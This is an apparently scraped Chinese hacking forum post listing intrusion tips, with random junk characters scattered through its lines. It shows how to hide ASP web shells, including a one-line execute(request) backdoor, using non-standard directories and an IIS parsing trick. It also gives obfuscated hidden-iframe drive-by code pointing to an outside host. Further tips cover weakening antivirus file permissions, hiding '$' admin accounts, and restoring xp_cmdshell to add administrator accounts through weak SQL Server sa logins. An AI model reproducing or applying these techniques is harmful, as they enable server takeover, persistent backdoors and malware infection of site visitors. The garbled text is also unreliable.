; Z9 R/ a7 l1 }
53、隐藏ASP后门的两种方法) v& h* `$ X& X0 s* d* R3 f4 d
1、建立非标准目录:mkdir images..\! j1 }/ `' W; m# q8 g9 ?
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
& L7 M5 D" @% X. k7 v; |通过web访问ASP木马:http://ip/images../news.asp?action=login! Q# a; r1 P9 b) S3 s" i
如何删除非标准目录:rmdir images..\ /s
& O( V$ ]; T: Y0 c8 f" z N* M2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
* l. ]8 z! W: `% d1 G, n( X, mmkdir programme.asp
& |1 `2 @$ j7 ^7 D新建1.txt文件内容:<!--#include file=”12.jpg”-->3 r2 ^$ ? B# ~; N& P, W+ e
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件# H5 Z# c. K, L5 Z7 G
attrib +H +S programme.asp
' t9 ?/ T+ S5 V1 b2 r$ d通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt' k4 a9 @0 G6 W" t
. @# k- B* n" M6 @8 B T5 j) y, I7 r54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。9 n* W. E" p! D& u1 q/ H
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。8 t U& c6 ` F- [) e; g& ~
|. e, r1 z$ y. e55、JS隐蔽挂马
1 d( N1 H0 H; z1.
3 x2 f D$ P. w W0 o; Nvar tr4c3="<iframe src=ht";4 }- t6 \0 Y j r% ]" r. Y( x
tr4c3 = tr4c3+"tp:/";
, I8 z! |0 k6 g- r; ^tr4c3 = tr4c3+"/ww";
( f" M+ c. o' f9 w; Htr4c3 = tr4c3+"w.tr4";
3 u! M3 ]# S/ E* Y" xtr4c3 = tr4c3+"c3.com/inc/m";) }) [9 K, K2 j" m% M% c [
tr4c3 = tr4c3+"m.htm style="display:none"></i";4 Z$ M1 l& ~; f) Y% m7 E4 V* `% i
tr4c3 =tr4c3+"frame>'";, `# z- e$ n/ z- a K6 R) e6 c
document.write(tr4c3);4 v# K7 a! T( j1 @/ E$ E `
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。+ |& I6 M I5 N$ N
3 ~1 {$ R9 ]4 ]" d0 r7 ?2.
6 H: U4 [) c$ |转换进制,然后用EVAL执行。如( ~# [* ]0 J6 X: b/ A" a
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");$ B N+ y3 |7 _5 v# D
不过这个有点显眼。, O6 v. b. k$ ]. F! q5 w
3.
5 Q. F. q( q. `2 |document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>'); v3 s: ?: W; S8 @8 x4 P, U& C
最后一点,别忘了把文件的时间也修改下。
' f3 @9 a8 a. w
0 b. h! L4 k. R7 I8 K* I. ` b56.3389终端入侵常用DOS命令
! Z" w) X3 C# K) l3 R8 ztaskkill taskkill /PID 1248 /t
7 }8 }, d i/ p2 T- z7 {% N4 Y: n: u! s+ c; ?6 d
tasklist 查进程
3 Q2 L% Z: }$ w+ [+ d. u$ F- J# ^5 p3 u# l6 `8 d2 p' P
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
9 e# }2 Y7 R& ~/ Eiisreset /reboot; Y* l1 P9 M; I3 e9 ]# h- f
tsshutdn /reboot /delay:1 重起服务器& d! c% ~( T6 A0 [7 n% Q
- J* W% ?# x8 g- S% `logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
/ E0 ]" F2 R* l' N5 c. K& z1 {: N7 \: @: g j- e9 ^+ V
query user 查看当前终端用户在线情况
+ Y) S" M5 u2 i3 G
* u" v+ C4 S3 ^, v% N/ C6 ]( Q要显示有关所有会话使用的进程的信息,请键入:query process *7 V+ Z" ?" C0 S# e% S& A+ A
. u* ?5 t$ M7 F0 @6 A. ?要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
( G1 v! E6 k; P7 P* f0 [% J6 o
. [) u* |+ `5 d' _+ ]要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER21 O. W# Z4 M8 T) A+ h) I
3 w( l! y8 k+ k$ u9 P9 y8 T* }- m要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
" q$ X6 M- y" T: G+ Z
% q+ S7 T7 b* c' O# N命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启' y C% f8 u: |6 e8 }. i
: g% S# q1 a+ z3 v$ t% `命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统% G, O- H" F0 n/ y# _2 g
" A: g" {% |& U3 ]5 ~命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
: y4 n' f* J( I7 P# k% |) V4 T6 X0 m: U5 B; E
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
0 K8 K6 X6 J8 S+ n2 S# Z2 t: U4 n2 s3 G0 ]
56、在地址栏或按Ctrl+O,输入:' { }/ n& x2 R2 C1 V1 d
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
0 ]+ U& N1 s& I, R6 w5 k8 h
( t9 W1 W" f2 a源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
# Z' l K3 Y) F4 z
# X' |% i# W/ @6 {! w57、net user的时候,是不能显示加$的用户,但是如果不处理的话,' q4 u4 U4 ^9 x! F' S% O$ U+ [
用net localgroup administrators是可以看到管理组下,加了$的用户的。
7 k/ v- G8 t# k( {# M1 W
" j. t9 B( R ]1 o/ h9 e58、 sa弱口令相关命令( w0 |5 [) c# k9 O8 P
2 g4 m- k$ y8 G- `+ Q6 A, `
一.更改sa口令方法:
% `3 Y6 n1 P9 X用sql综合利用工具连接后,执行命令:
* r; }5 M8 [; Z8 yexec sp_password NULL,'20001001','sa'
5 n9 `$ W2 ?' \! s D; C) \(提示:慎用!)1 D! @: E0 G0 B
8 Z0 z+ b/ `5 V: G3 n
二.简单修补sa弱口令.* y( V$ }" m8 f6 i. Z2 \
9 A$ ~6 z) P/ U7 u6 e( P. i2 P
方法1:查询分离器连接后执行:$ K( e" a5 y T: o8 R: O
if exists (select * from; |. f& i# F: ]$ E! L* [
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and' G, v& Q) j+ a+ y$ M* l
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)( h& t% w7 z r! ?/ I( a- u) v
; V& U$ H: V& r* P* {
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
- W! O3 t! ^# I) b3 p& p2 b# f( x% |1 f0 O {
GO% ~' _% T4 j( V! G8 d1 q" V U
2 E$ F3 U, O2 d: U* }
然后按F5键命令执行完毕$ n! O$ h" w- b5 O* o4 ?
! q; A( Q- C. b$ C' c; u
方法2:查询分离器连接后
6 j1 G, Z/ e/ Z/ v4 p1 `第一步执行:use master5 b2 x! j! H: a# B" ^+ v1 c% q3 B8 Z
第二步执行:sp_dropextendedproc 'xp_cmdshell'
9 T& G/ h) R/ R1 h4 v3 ?6 q# |, ?然后按F5键命令执行完毕
" N2 W. e' Z- X/ e& Y) q2 q
h. {3 H$ M/ m, T( d9 `( I
. I# a# z$ V% d三.常见情况恢复执行xp_cmdshell.9 C. C' t% X% R7 {- m$ E4 C
9 E$ B8 \5 H0 y- ~# d
) E* c( v& I( H1 ^& r4 m1 未能找到存储过程'master..xpcmdshell'.& S' O8 i7 u3 `8 \* \6 z' i
恢复方法:查询分离器连接后,
& {+ }2 Z6 ?" V/ n. H第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int5 t# [ J/ e/ |' J1 O
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
" c9 w; T& a* u然后按F5键命令执行完毕7 k$ }( | I4 `2 U5 m* u8 D4 o
+ r% \7 b$ P: c3 F. g: j. s" X, R- M
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
" D" r" v. @* R2 A4 Q恢复方法:查询分离器连接后," W' U( s1 C8 C; l
第一步执行:sp_dropextendedproc "xp_cmdshell"- r4 \9 U$ \& U8 j
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
4 y: P# q* r( ~3 E2 J# h; L然后按F5键命令执行完毕7 {) I8 I! q7 ^' r1 B3 [: }9 m, s
3 C- e1 E: n/ P3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)8 e# k/ G0 r4 |$ ~
恢复方法:查询分离器连接后,: Y2 v9 G" L5 u: o6 d7 H2 L
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'7 P$ e# v9 i- q1 K
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
! K' F: d3 ?# Z2 B! J( S8 u/ l然后按F5键命令执行完毕- V# K g4 B7 ]$ ?
1 ^# ^' G0 y2 [3 ~$ q8 x
四.终极方法.* {3 E( w1 m1 _; [% L" \1 k3 B" Y( x
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:. P; [0 s+ y% J6 O! w
查询分离器连接后,
) w; O8 H% Z& B+ }2000servser系统:
( M& i: Y$ ?& i. vdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
( ]3 g, o$ ]& G8 r! Z2 Y! y# ]
" }' `. f% n+ y+ e( Q& B7 ?5 `6 |declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
( q8 ~$ z. h% w
# M3 l% i# I- C1 b. Z6 K( b8 S) z, uxp或2003server系统:
4 Q, a% s9 y3 d% M( N! d |8 v2 y1 [4 ~
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'+ T6 W8 R1 @" v* C* o; P& N+ W
) l. S2 G6 i1 @- Z5 fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'- N% s, y) {$ s# A' z0 ]
|
发表于 2012-9-15 14:51:03
收藏
支持
反对